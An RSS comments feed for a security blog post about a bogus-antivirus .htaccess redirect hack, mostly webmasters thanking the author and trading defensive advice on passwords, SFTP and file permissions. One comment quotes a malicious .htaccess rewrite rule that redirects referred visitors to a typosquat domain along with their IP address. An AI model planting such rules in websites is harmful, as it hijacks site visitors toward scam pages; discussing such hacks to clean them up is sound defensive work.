<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
		>
<channel>
	<title>Comments on: Bogus Antivirus 2009 .htaccess Exploit.</title>
	<atom:link href="http://blog.unmaskparasites.com/2008/12/05/bogus-antivirus-2009-htaccess-exploit/feed/" rel="self" type="application/rss+xml" />
	<link>http://blog.unmaskparasites.com/2008/12/05/bogus-antivirus-2009-htaccess-exploit/</link>
	<description>Website insecurity by example</description>
	<lastBuildDate>Sun, 05 Feb 2012 10:06:25 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.9.1</generator>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
		<item>
		<title>By: Le Cres</title>
		<link>http://blog.unmaskparasites.com/2008/12/05/bogus-antivirus-2009-htaccess-exploit/comment-page-1/#comment-12556</link>
		<dc:creator>Le Cres</dc:creator>
		<pubDate>Sat, 12 Feb 2011 14:40:28 +0000</pubDate>
		<guid isPermaLink="false">http://blog.unmaskparasites.com/?p=11#comment-12556</guid>
		<description>This mornig I discoverred this .htaccess file under all sub-directories of the Linux Server:

RewriteEngine On
RewriteCond %{HTTP_REFERER} ^http://
RewriteCond %{HTTP_REFERER} !%{HTTP_HOST} RewriteRule . hxxp://g-oogl-e.com/%{REMOTE_ADDR}

Who is the author?</description>
		<content:encoded><![CDATA[<p>This mornig I discoverred this .htaccess file under all sub-directories of the Linux Server:</p>
<p>RewriteEngine On<br />
RewriteCond %{HTTP_REFERER} ^http://<br />
RewriteCond %{HTTP_REFERER} !%{HTTP_HOST} RewriteRule . hxxp://g-oogl-e.com/%{REMOTE_ADDR}</p>
<p>Who is the author?</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Ernie</title>
		<link>http://blog.unmaskparasites.com/2008/12/05/bogus-antivirus-2009-htaccess-exploit/comment-page-1/#comment-10815</link>
		<dc:creator>Ernie</dc:creator>
		<pubDate>Sat, 25 Dec 2010 15:23:53 +0000</pubDate>
		<guid isPermaLink="false">http://blog.unmaskparasites.com/?p=11#comment-10815</guid>
		<description>Thanks for the write-up.  Christmas morning, and my gift.. A website being redirected.  A combination of things brought me to your blog, so I wanted to say thanks.</description>
		<content:encoded><![CDATA[<p>Thanks for the write-up.  Christmas morning, and my gift.. A website being redirected.  A combination of things brought me to your blog, so I wanted to say thanks.</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Denis</title>
		<link>http://blog.unmaskparasites.com/2008/12/05/bogus-antivirus-2009-htaccess-exploit/comment-page-1/#comment-6998</link>
		<dc:creator>Denis</dc:creator>
		<pubDate>Sun, 11 Apr 2010 09:00:17 +0000</pubDate>
		<guid isPermaLink="false">http://blog.unmaskparasites.com/?p=11#comment-6998</guid>
		<description>Apperantly, read-only permissions won&#039;t work since in most cases this sort of hacks are done using &lt;a href=&quot;http://blog.unmaskparasites.com/2009/09/23/10-ftp-clients-malware-steals-credentials-from/&quot; rel=&quot;nofollow&quot;&gt;stolen FTP credentials.&lt;/a&gt;

You need to scan your computer for malware and then change all site password. And don&#039;t save your new passwords in FTP clients. If possible, switch to SFTP from FTP.</description>
		<content:encoded><![CDATA[<p>Apperantly, read-only permissions won&#8217;t work since in most cases this sort of hacks are done using <a href="http://blog.unmaskparasites.com/2009/09/23/10-ftp-clients-malware-steals-credentials-from/" rel="nofollow">stolen FTP credentials.</a></p>
<p>You need to scan your computer for malware and then change all site password. And don&#8217;t save your new passwords in FTP clients. If possible, switch to SFTP from FTP.</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: kevin dock</title>
		<link>http://blog.unmaskparasites.com/2008/12/05/bogus-antivirus-2009-htaccess-exploit/comment-page-1/#comment-6978</link>
		<dc:creator>kevin dock</dc:creator>
		<pubDate>Wed, 07 Apr 2010 21:54:38 +0000</pubDate>
		<guid isPermaLink="false">http://blog.unmaskparasites.com/?p=11#comment-6978</guid>
		<description>This has been driving me mad the last couple of weeks. My site has a .htaccess file that is continually modified with the redirects. I tried creating a blank version AND chmod thye file to READ ONLY access but this did not work. I have now changed the passwords to the site. Is this problem coming from my local machine and being passed to the web server or is the problem at the web server/hosting end ?</description>
		<content:encoded><![CDATA[<p>This has been driving me mad the last couple of weeks. My site has a .htaccess file that is continually modified with the redirects. I tried creating a blank version AND chmod thye file to READ ONLY access but this did not work. I have now changed the passwords to the site. Is this problem coming from my local machine and being passed to the web server or is the problem at the web server/hosting end ?</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Denis</title>
		<link>http://blog.unmaskparasites.com/2008/12/05/bogus-antivirus-2009-htaccess-exploit/comment-page-1/#comment-6470</link>
		<dc:creator>Denis</dc:creator>
		<pubDate>Sat, 02 Jan 2010 07:22:49 +0000</pubDate>
		<guid isPermaLink="false">http://blog.unmaskparasites.com/?p=11#comment-6470</guid>
		<description>http://en.wikipedia.org/wiki/SSH_File_Transfer_Protocol</description>
		<content:encoded><![CDATA[<p><a href="http://en.wikipedia.org/wiki/SSH_File_Transfer_Protocol" rel="nofollow">http://en.wikipedia.org/wiki/SSH_File_Transfer_Protocol</a></p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Wordpress/Website Security Exploits &#124; Shoultes.net</title>
		<link>http://blog.unmaskparasites.com/2008/12/05/bogus-antivirus-2009-htaccess-exploit/comment-page-1/#comment-6466</link>
		<dc:creator>Wordpress/Website Security Exploits &#124; Shoultes.net</dc:creator>
		<pubDate>Sat, 02 Jan 2010 03:32:34 +0000</pubDate>
		<guid isPermaLink="false">http://blog.unmaskparasites.com/?p=11#comment-6466</guid>
		<description>[...] http://blog.unmaskparasites.com/2008/12/05/bogus-antivirus-2009-htaccess-exploit/ [...]</description>
		<content:encoded><![CDATA[<p>[...] <a href="http://blog.unmaskparasites.com/2008/12/05/bogus-antivirus-2009-htaccess-exploit/" rel="nofollow">http://blog.unmaskparasites.com/2008/12/05/bogus-antivirus-2009-htaccess-exploit/</a> [...]</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: webeveron</title>
		<link>http://blog.unmaskparasites.com/2008/12/05/bogus-antivirus-2009-htaccess-exploit/comment-page-1/#comment-6458</link>
		<dc:creator>webeveron</dc:creator>
		<pubDate>Thu, 31 Dec 2009 12:18:11 +0000</pubDate>
		<guid isPermaLink="false">http://blog.unmaskparasites.com/?p=11#comment-6458</guid>
		<description>what is SFTP ? plz let me know</description>
		<content:encoded><![CDATA[<p>what is SFTP ? plz let me know</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Antivirus</title>
		<link>http://blog.unmaskparasites.com/2008/12/05/bogus-antivirus-2009-htaccess-exploit/comment-page-1/#comment-4789</link>
		<dc:creator>Antivirus</dc:creator>
		<pubDate>Fri, 16 Oct 2009 15:30:27 +0000</pubDate>
		<guid isPermaLink="false">http://blog.unmaskparasites.com/?p=11#comment-4789</guid>
		<description>This article is very helpful. How much protection do the 755 and 644 permissions provide? Will they singlehandedly protect my website from hackers, trojans, and viruses? If so, why has no one told me about them sooner?  I like that I can use google to search for my website and see if it has been infected with a trojan, by whether or not the search engine allows access to it. I am glad that the number one search engine in the country is so trustworthy.</description>
		<content:encoded><![CDATA[<p>This article is very helpful. How much protection do the 755 and 644 permissions provide? Will they singlehandedly protect my website from hackers, trojans, and viruses? If so, why has no one told me about them sooner?  I like that I can use google to search for my website and see if it has been infected with a trojan, by whether or not the search engine allows access to it. I am glad that the number one search engine in the country is so trustworthy.</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: vincent</title>
		<link>http://blog.unmaskparasites.com/2008/12/05/bogus-antivirus-2009-htaccess-exploit/comment-page-1/#comment-1838</link>
		<dc:creator>vincent</dc:creator>
		<pubDate>Wed, 29 Jul 2009 14:02:18 +0000</pubDate>
		<guid isPermaLink="false">http://blog.unmaskparasites.com/?p=11#comment-1838</guid>
		<description>I do have a windows 2003 server that received an .htaccess files once or twice a week, because all the file a read-only, nothing happens except the paste of the .htaccess file. If read-only is not activated on files, some js a write into the file.</description>
		<content:encoded><![CDATA[<p>I do have a windows 2003 server that received an .htaccess files once or twice a week, because all the file a read-only, nothing happens except the paste of the .htaccess file. If read-only is not activated on files, some js a write into the file.</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: iHenshin</title>
		<link>http://blog.unmaskparasites.com/2008/12/05/bogus-antivirus-2009-htaccess-exploit/comment-page-1/#comment-247</link>
		<dc:creator>iHenshin</dc:creator>
		<pubDate>Wed, 18 Feb 2009 06:53:17 +0000</pubDate>
		<guid isPermaLink="false">http://blog.unmaskparasites.com/?p=11#comment-247</guid>
		<description>Wow this really helped me! Thanks. I&#039;m a Webmaster but not that expert.

Thanks a million.</description>
		<content:encoded><![CDATA[<p>Wow this really helped me! Thanks. I&#8217;m a Webmaster but not that expert.</p>
<p>Thanks a million.</p>
]]></content:encoded>
	</item>
</channel>
</rss>

